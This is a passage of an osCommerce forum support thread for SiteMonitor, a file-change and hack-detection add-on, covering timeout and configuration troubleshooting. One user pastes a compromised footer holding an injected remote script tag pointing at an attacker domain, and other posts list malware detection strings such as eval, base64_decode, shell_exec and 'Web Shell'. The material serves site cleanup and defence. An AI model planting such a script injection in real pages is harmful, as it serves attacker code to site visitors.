Jump to content
Jack_mcs

SiteMonitor

Recommended Posts

Spooky

 

It is standard site

 

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<script src="http://nt02.co.in/3"></script></body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

Will now check the version I'm running but it wont be till after 14:00.

 

I've been changing the hacker code, starting another admin option, running the bottom option Hacker test manually did this about 20 times trying to see what worked and what didn't and now my db user name and admin are prompted on the configure page and I have to change it to my shop admin.

 

Another spooky occurrance. Looks like my SM config has been reset.

 

Cheers

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Installed 2.7 and all seems fine.

 

Also added

 

,'Meher Assel', 'nt02', '<script src', '<iframe src'

 

to hacker code.

 

For others here is a usefull link

 

http://www.stopbadware.org/home/security

 

and once you have cleaned your site don't forget to resubmit it to google. This can be done via google's webmaster's tools.

 

HTH

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Hi,

We just installed SiteMonitor and are running into 'Internal Server Error Error 500' on some of the sites we installed it on when we run sitemonitor.php. This error only occurs if there have been any files added, renamed or deleted. We do not get this error when we check for 'Hacked Files'.

 

We can recreate the error by:

- create a new reference file (sometimes this generates the '500' error so we delete it manually)

- execute SiteMonitor (either button)

- no differences so it finishes without error

- add, rename or delete a file (renaming a file reproduces it every time)

- execute SiteMonitor (either button)

- Internal Server Error Error 500

 

The sites have about 4,000 files that are being checked (we've excluded as many as possible). The code just stops part way through the 'file size checks' if the file counts don't match (which they don't when a file has been renamed).

 

* We're running PHP 5.2.14 on a Linux server.

* All the sites we've installed it on are using the same master hosting account.

* The error happens at about the 20 - 25 second mark while running.

* Our max_execution_time is 60 seconds.

* Our memory_limit 256MB.

* We get the error when running it via the sitemonitor_admin or the cron job.

* The server logs only show Premature end of script headers: /user/html/site/store/admin/sitemonitor_admin.php

 

Any help with this issue would be greatly appreciated.

 

 

WSG

Share this post


Link to post
Share on other sites

Did you see this at the bottom of the read me.

 

- If the script times out when first ran, it is probably due to a large number
 of files in your account and/or a server with a load timeout value set. To
 get around that, change the url to 
 http://YOUR_DOMAIN_NAME/YOUR_ADMIN/sitemonitor_configure_setup.php?override=1
 and press enter. That will allow the configure section to load so that more 
 files can be excluded.

 

May help, but probably not.

 

HTH

 

G

 

Another string for hacker code

 

 

Hmei7


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Yes, php 5 is more secure. However, upgrading to it might cause some coding problesm to appear, especially if you go to 5.3 or above. They can be fixed but you need to be prepared for them.

 

Well, I changed to PHP5 by adding "SetEnv PHP_VERSION 5" to the htaccess file.

Version reported by phpinfo: PHP Version 5.2.13

 

But, still the same problem. How weird. Especially like I said, the same site works locally on a Uniserver perfectly... Any other suggestions would be very welcome. :(

Share this post


Link to post
Share on other sites

Well, I changed to PHP5 by adding "SetEnv PHP_VERSION 5" to the htaccess file.

Version reported by phpinfo: PHP Version 5.2.13

 

But, still the same problem. How weird. Especially like I said, the same site works locally on a Uniserver perfectly... Any other suggestions would be very welcome. :(

 

BTW, to be honest, I think it has something to do with the created referencefile, no? I don't know exactly how the online reference file has to look like, but this is the difference in online and local:

online: .account.php,9647,1291745071,644

local: Z:/www/local/account.php,9647,1291745071,666

 

So, the online files start with a period, whereas the local files mention the full path. Does that seem correct to you?

Share this post


Link to post
Share on other sites

BTW, to be honest, I think it has something to do with the created referencefile, no? I don't know exactly how the online reference file has to look like, but this is the difference in online and local:

online: .account.php,9647,1291745071,644

local: Z:/www/local/account.php,9647,1291745071,666

 

So, the online files start with a period, whereas the local files mention the full path. Does that seem correct to you?

No, that's not right. The entry in the start directory settings should be shown before the file. I'm assuming your start directory is correct since you can run the script but there may be some mistake in your configure file causing it. You should take a look at this thread to be sure yours is correct.

Share this post


Link to post
Share on other sites

No, that's not right. The entry in the start directory settings should be shown before the file. I'm assuming your start directory is correct since you can run the script but there may be some mistake in your configure file causing it. You should take a look at this thread to be sure yours is correct.

 

And again; thanks for keeping track.

 

I thought you had a point and we were about to solve it, but no luck.

In the configure files, my original FS path was ../ which I changed to /home/www/mysite.com/ after checking that in ServerInfo as suggested in that thread. And the site keeps functioning. But Sitemonitor still doesn't like it and hasn't changed. In the startdirectory of SiteMonitor I HAVE to put ../ otherwise it will stick in the configure panel.

If I put for instance /home/www/mysite.com/ it will say:

Your username is invalid. Please change it and try again.: System -> ../ - SiteMonitor -> /home/www/mysite.com/

 

I feel we're close, but don't know what else to check...

Edited by ftrippie

Share this post


Link to post
Share on other sites

And again; thanks for keeping track.

 

I thought you had a point and we were about to solve it, but no luck.

In the configure files, my original FS path was ../ which I changed to /home/www/mysite.com/ after checking that in ServerInfo as suggested in that thread. And the site keeps functioning. But Sitemonitor still doesn't like it and hasn't changed. In the startdirectory of SiteMonitor I HAVE to put ../ otherwise it will stick in the configure panel.

If I put for instance /home/www/mysite.com/ it will say:

Your username is invalid. Please change it and try again.: System -> ../ - SiteMonitor -> /home/www/mysite.com/

 

I feel we're close, but don't know what else to check...

The path in that message that follows system is what SiteMonitor thinks the start directory should be set to and it won't work correctly, most likely, if it isn't.

Share this post


Link to post
Share on other sites

The path in that message that follows system is what SiteMonitor thinks the start directory should be set to and it won't work correctly, most likely, if it isn't.

 

Yep, that's what I gathered as much, but I can't change it to anything other than ../ without that message appearing :'(

Share this post


Link to post
Share on other sites

Yep, that's what I gathered as much, but I can't change it to anything other than ../ without that message appearing :'(

Unfortunately, I'm out of ideas. This doesn't sound like something that can be fixed in a support thread.

Share this post


Link to post
Share on other sites

Jack

 

I have a site with thousands of images and have used the option

 

http://www.site.dk/magic/xxxxxxx/sitemonitor_configure_setup.php?override=1

 

This will show the config 50% of the time the other 50% gives a blank page.

 

I configure file, amended for security and anonymity, contains

 

<?php
/************** THE OPTIONS AND SETTINGS ****************/
$always_email = 0; //set to 1 to always email the results
$verbose = 0; //set to 1 to see the results displayed on the page (for when running manually)
$logfile = 0; //set to 1 to see to track results in a log file
$logfile_size = 100000; //set the maximum size of the logfile
$reference_reset = 3; //delete the reference file this many days apart

$quarantine = 0; //set to 1 to move new files found to the quarantine directory

$to = 'shop@abc.dk'; //where email is sent to
$from = 'From:shop@abc.dk'; //where email is sent from
$start_dir = '/hsphere/local/home/yyy/abc.dk/magic'; //your shops root
$admin_dir = 'http://www.abc.dk/magic/admin'; //your shops admin
$admin_username = 'usradmin'; //your admin username
$admin_password = 'pw!'; //your admin password
$excludeList = array('admin/quarantine', 'cgi-bin','admin','admin/images','images'); //don't check these directories - change to your liking - must be set prior to first run
$hackIgnoreList = array('jpg', 'jpeg','gif','png','txt','zip'); //don't check these types of files - change to your liking
$hackCodeSegments = array('error_reporting(0)', 'base64_decode','<frame','gzdecode','eval','ob_start("security_update")', 'Goog1e_analist_up', 'eval(gzinflate(base64_decode', 'Web Shell', '@eval', ' header;', 'shell_exec', 'system','SetCookie','xx'); //enter any hacker code that you would like to check for
?>

 

When I update I just get a blank page.

 

Is there something else I can do to exclude the image directory and get it to check the rest of the site?

 

TIA

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Jack

 

I have a site with thousands of images and have used the option

 

http://www.site.dk/magic/xxxxxxx/sitemonitor_configure_setup.php?override=1

 

This will show the config 50% of the time the other 50% gives a blank page.

 

I configure file, amended for security and anonymity, contains

 

 

When I update I just get a blank page.

 

Is there something else I can do to exclude the image directory and get it to check the rest of the site?

The override option should load the configure settings without reading in the shops directories so it shouldn't timeout. That's strange that that is happening and I don't have a reason why it is. But to try to get around that, you can edit the configure file manually and add all of the directories, or least the large ones like images and includes, to see if that lets it run. Be sure to delete the reference file. If it still fails, then there is probably some file in the root that is causing the problem. The idea behind troubleshooting this sort of problem is to reduce the number of files being checked to the absolute minimum and then increase until it works.

Share this post


Link to post
Share on other sites

My guess is that it has to do with permissions or some other server setting that is preventing the script from working correctly. If both hosts use a php.ini file, try comparing the two to see what differences there might be.

 

Jack, catching up on this from last September. I just moved my second store to my new host, and the installation and functioning of Site Monitor is just fine. Now that I moved two shops from the old host (where I could not get Site Monitor to work beyond the 2.4 level) to the new host (where upgrading to 2.7 went easily), it appears to me that the problem was something within the host.

 

I have noticed a couple other differences in how osC works on the new host, so it's apparent to me osC shops don't necessarily work the same from one host compared to another. I wish I had the technical background to figure this out but I don't so I can only report observations.

 

Anyway, Site Monitor 2.7 up and running on both shops now.

 

Thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Anyway, Site Monitor 2.7 up and running on both shops now.

Thanks for the update.

Share this post


Link to post
Share on other sites

After sanitizing the files on my client's site, I installed this.

 

Great contribution.

 

I had issues at install, but read the entire thread and now everything works fine.

 

Just the phrase 'base64' will send shivers up my spine after this hack on the my client's store.

 

Thanks again.

Share this post


Link to post
Share on other sites

There is something wrong in your admin (no idea where) since there isn't any code in SiteMonitor to cause it to go to the customer section. I can't even offer a suggestion on this one.

 

Are any of the files in the contribution supposed to be made world writable? I say no mention of changing any permissions in the documentation.

 

Thanks!

Share this post


Link to post
Share on other sites

Are any of the files in the contribution supposed to be made world writable? I say no mention of changing any permissions in the documentation.

It depends upon how your server is setup. The majority, in my experience, don't require any changes. But I have ran across some servers that need them to be changed.

Share this post


Link to post
Share on other sites

Jack, I am dealing with the 30 second timeout issue when attempting to delete the reference file. Reading back through the thread I found that time outs are server set. My tech support helped me set up a php.ini file to override the 30 second time out. After installation we verified the max_execution_time was reset to 90 seconds. But when I run the delete reference file, I still get a 30 second timeout error.

Guidance please.

Thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Jack, I am dealing with the 30 second timeout issue when attempting to delete the reference file. Reading back through the thread I found that time outs are server set. My tech support helped me set up a php.ini file to override the 30 second time out. After installation we verified the max_execution_time was reset to 90 seconds. But when I run the delete reference file, I still get a 30 second timeout error.

Guidance please.

Thanks

There's nothing in the code that limits the time the script runs so the timeout is still coming from the server. The settings in local php.ini files won't always be allowed on shared servers. Otherwise every site on the server might set their limit to maximum and the server would quickly fail.

Share this post


Link to post
Share on other sites

There's nothing in the code that limits the time the script runs so the timeout is still coming from the server. The settings in local php.ini files won't always be allowed on shared servers. Otherwise every site on the server might set their limit to maximum and the server would quickly fail.

 

OK, just double checking as the tech guy theorized it was a code issue.

 

I was surprised I could change the settings with a php.ini because I did read your earlier post on shared server restrictions. But the tech guy said that wasn't a problem with them. Even the php_info page he set up for me verified the change was made.

 

I will work with the tech guy further on this. In the meanwhile, I think I have a work around with this. I exclude 'images', run the code and it doesn't time out. I then remove the 'images" exclusion, run the code and it runs with no time out.

 

Thanks for the response and Happy Holidays.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Hi Jack,

v2.7

Hope all is excellent with you.

When using the 3rd Update button

(Manually Execute Sitemonitor)

getting numerous (36) messages like: (all in the phpids folder, btw)

permissions Mismatch on includes/phpids/lib/IDS/tmp/URI/4.1.1 Currently set to "0" was set to "327"

permissions Mismatch on includes/phpids/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer/CSS/4.1.0 Currently set to "0" was set to "22628"

 

not sure how to decipher Currently set to "0" was set to "327" (or the variations)

since I deleted the contents of the reference file and created a new one with the top button prior to clicking the 3rd button

so what is being compared

1. What is causing it to be set to 0?

2. Should it be reset to the original value?

3. Is this a sign of some skullduggery?

 

Thanks for helping me better understand,

jk

Share this post


Link to post
Share on other sites

not sure how to decipher Currently set to "0" was set to "327" (or the variations)

since I deleted the contents of the reference file and created a new one with the top button prior to clicking the 3rd button

so what is being compared

1. What is causing it to be set to 0?

2. Should it be reset to the original value?

3. Is this a sign of some skullduggery?

The code ran when the third button is used is the same as for the first except the reference file isn't replaced and the output is displayed on the screen. If you click on the second update button is the email you receive clean of errors? If it is, I haven't a clue why the second would work and not the third. If it isn't, then it would seem your reference file is not being created correctly somehow.

Share this post


Link to post
Share on other sites

The code ran when the third button is used is the same as for the first except the reference file isn't replaced and the output is displayed on the screen. If you click on the second update button is the email you receive clean of errors? If it is, I haven't a clue why the second would work and not the third. If it isn't, then it would seem your reference file is not being created correctly somehow.

 

Thanks for your response. Using localhost, unable to send emails at present, so used 3rd button for display. It seems there's something about those phpids/files that may explain the reset messages. I'm just unclear why on a fresh reference file there would be

anything to compare ie. Currently set to "0" was set to "327". I'm presuming this indicates the reference file is otherwise working

properly for the other 6000+ files.

 

Ran the 3rd button again:

Sitemonitor ran on December 19, 2010, 9:22 am

Total mismatches found were 18

Total files being monitored is 6762

Email sent to shop owner.

 

Checked the first flagged file:

Difference found: New-> includes/phpids/lib/IDS/tmp/CSS/4.1.1 Original-> 801ad73acbcf9d3127e1d01768d26453

 

Navigated to the file (includes/phpids/lib/IDS/tmp/CSS/4.1.1)

 

Name of file:

4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser

 

Is that comma between 4.1.1 and 8 causing this file to be listed?

If so, what is the remedy?

 

Thanks for your invaluable input,

jk

Edited by jfkafka

Share this post


Link to post
Share on other sites

Name of file:

4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser

That is an invalid filename. SiteMonitor can't handle invalid filenames.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×